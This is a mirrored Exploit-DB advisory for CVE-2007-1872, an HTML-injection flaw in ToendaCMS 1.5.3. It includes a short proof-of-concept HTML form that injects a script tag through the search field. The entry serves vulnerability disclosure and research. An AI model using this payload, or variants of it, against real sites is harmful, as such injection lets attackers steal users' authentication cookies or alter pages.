- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29849
- Проверка EDB
-
- Пройдено
- Автор
- HANNO BOECK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1872
- Дата публикации
- 2007-04-12
ToendaCMS 1.5.3 - GET / POST Forms HTML Injection
HTML:
source: https://www.securityfocus.com/bid/23453/info
ToendaCMS is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
This issue affects ToendaCMS 1.5.3; other versions may also be affected.
<form action="http://toendainstallation/" method="post">
<input type="hidden" name="searchword" value='"><script>alert(1)</script>'>
<input type="hidden" name="id" value="search">
<input type="submit"></form>
- Источник
- www.exploit-db.com